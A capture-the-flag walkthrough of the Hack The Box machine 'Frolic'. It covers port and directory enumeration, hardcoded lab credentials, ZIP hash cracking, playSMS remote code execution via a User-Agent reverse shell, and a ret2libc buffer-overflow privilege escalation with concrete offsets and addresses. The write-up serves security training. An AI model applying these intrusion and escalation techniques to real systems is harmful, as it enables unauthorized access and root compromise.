Frolic

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.111 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,139,445,1880,9999 10.10.10.111 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

Guest log in on the SMB server is enabled, but there are no available shares we could check.

smbmap -H 10.10.10.111

  • -H IP address of host.

The website on port 1880 shows a login page for a Node-RED application.

On the other hand, the website on port 9999 just shows the default nginx page.

We can see some subdirectories with gobuster.

gobuster dir -u http://10.10.10.111:9999 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

  • -x file extensions to search for.

Exploitation

The /admin directory shows another login page.

If we try some random credentials, we'll see a popup alert saying that we only have 2 more attempts.

In the source code, we can see a js/login.js script being executed.

The script check for the admin user, and the superduperlooperpassword_lol password.

Logging in with those credentials, we get the message Login successfully.

And get redirected to /admin/success.html with some strange message.

It looks like Ook., but without the Ook word. Let's paste the message in the message.txt file, and add the Ook word before all the ., ? and ! characters.

cat message.txt | sed 's/./Ook./g' | sed 's/!/Ook!/g' | sed 's/?/Ook?/g'

Now we could use tools such us dcode.fr to decode the message.

We have a new directory. Let's check it out.

It looks like some base64 encoded text. If we put it on a file, and decode it, we'll see what looks like a .zip file because the first characters are the ZIP magic numbers PK.

cat base64 | base64 -d

Let's put the output to a file called msg.zip.

cat base64 | base64 -d > msg.zip

file msg.zip

If we try to decompress the file, it will ask for a password.

unzip msg.zip

We could get the hash for the ZIP file.

zip2john msg.zip > msg.zip.hash

And try to break it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt msg.zip.hash

Now we can decompress the file with the password password.

unzip msg.zip

The index.php file contains hex code.

cat index.php

If we decode it, we'll see some base64 code again.

cat index.php | xxd -r -p

We get some brainfuck code, if we decode the base64 code.

cat index.php | xxd -r -p | tr -d "\n\r" | base64 -d

We could use dcode.fr again to decode the message. We'll get what looks like a password.

We found with gobuster some other directories we have not seen yet, such us /dev , which shows a 403 Forbidden code.

But we could try to list directories again, but this time under the /dev directory.

gobuster dir -u http://10.10.10.111:9999/dev -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

  • -x file extensions to search for.

There is a new directory under /dev called /backup, which contains another directory called /playsms.

This new directory has another login page, in which we can log is with the user admin, and the password we found earlier idkwhatispass.

If we search for any common vulnerabilities on playSMS, we'll see that there is quite a few of them.

searchsploit playsms

This specific exploit explains how to get Remote Code Execution on the web server. The vulnerability allows us to execute commands via the User Agent header. First, we'll have to create the backdoor.csv file with the following content.

Now, go to the following URL.

http://10.10.10.111:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list

Upload the backdoor.csv file, and intercept the request with BurpSuite, and put a command that sends us a reverse shell on the User-Agent header.

Before hitting Forward, let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

If now we forward the request, we should get a shell as the www-data user. Then we'll be able to grab the user flag.

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

There is one hidden folder called .binary in the home directory on the user ayush.

ls -la /home/ayush/

The directory contains a file called rop with SUID permissions.

ls -l /home/ayush/.binary/

If we execute the binary, it will ask for a message.

rop

Giving a message as an argument just prints it out.

rop testing

If I generate 500 A characters with python, and put them as an argument of the rop binary, the program will crash.

rop $(python -c "print('A'*500)")

This means that the binary might be vulnerable to a Buffer Overflow attack. Let's transfer the binary to our machine. Set a simple HTTP server with python on the victim machine.

python -m SimpleHTTPServer 1234

Then, download it from our local machine.

wget http://10.10.10.111:1234/rop

chmod +x rop

Let's run the binary with gdb.

gdb ./rop

Note that I am using gef. The same way as before, if I run the script with 500 A characters, i will crash, and I'll be able to see all the registries filled with 41.

gef➤ r $(python -c "print('A'*500)")

The program only has the NX memory protection enabled.

Data Execution Prevention (DEP) or No-Execute (NX) works with the processor to help prevent buffer overflow attacks by blocking code execution from memory that is marked as non-executable.

gef➤ checksec

We can also check on the victim machine that ASLR is not enabled.

Address space layout randomization (ASLR) is a memory-protection process for operating systems that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.

cat /proc/sys/kernel/randomize_va_space

As ASLR is disabled, and the NX memory protection is enabled, the easiest way of exploiting this buffer overflow vulnerability is doing a Return to libc attack.

Return to lib is a tactic used for executing code that is not on the stack but in a sector of memory that is executable, for example in libc. The code used to break the program are functions within this library.

First, let's check at what point we start overwriting the EIP. Create a pattern with gef.

gef➤ pattern create 100

And execute the program giving the pattern as an argument.

gef➤ r aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

As we see, the EIP has the vale naaa. With that value, we could see that the offset is 52.

gef➤ pattern offset $eip

Now, as I have control of the EIP, I could fill it with B characters.

gef➤ r $(python -c "print('A'*52+'B'*4)")

To exploit Return to Libc, and be able to spawn a shell as root, we'll need the system address, the exit address, the /bin/bash address and the base_libc address. First, we could get the base_libc address from the victim machine, which is 0xb7e19000 in this case.

ldd nop

We can see that the offset of the system and exit functions are 0x0002e9d0 and 0x0003ada0.

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E " system@@| exit@@"

  • -s display the symbol table.

Finally, we'll need the offset of the /bin/sh function, which is 0x0015ba0b.

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"

  • -a scan the entire file.

  • -t x print the location of the string in base 16.

Now, that I have the function's offset and the base_lib address, I can calculate the system, exit and /bin/sh addresses by adding the offset to the base_lib address.

The final payload will be the initial 52 A characters, the system address, the exit address and the /bin/sh address. The following script will calculate all the addresses, execute the rop binary giving the final payload as an argument, and it should spawn a shell as root.

If we execute the script, we should get a shell as root, and then all we have to do is reap the harvest and take the root flag.

python /tmp/privEsc/bof.py

Last updated

Was this helpful?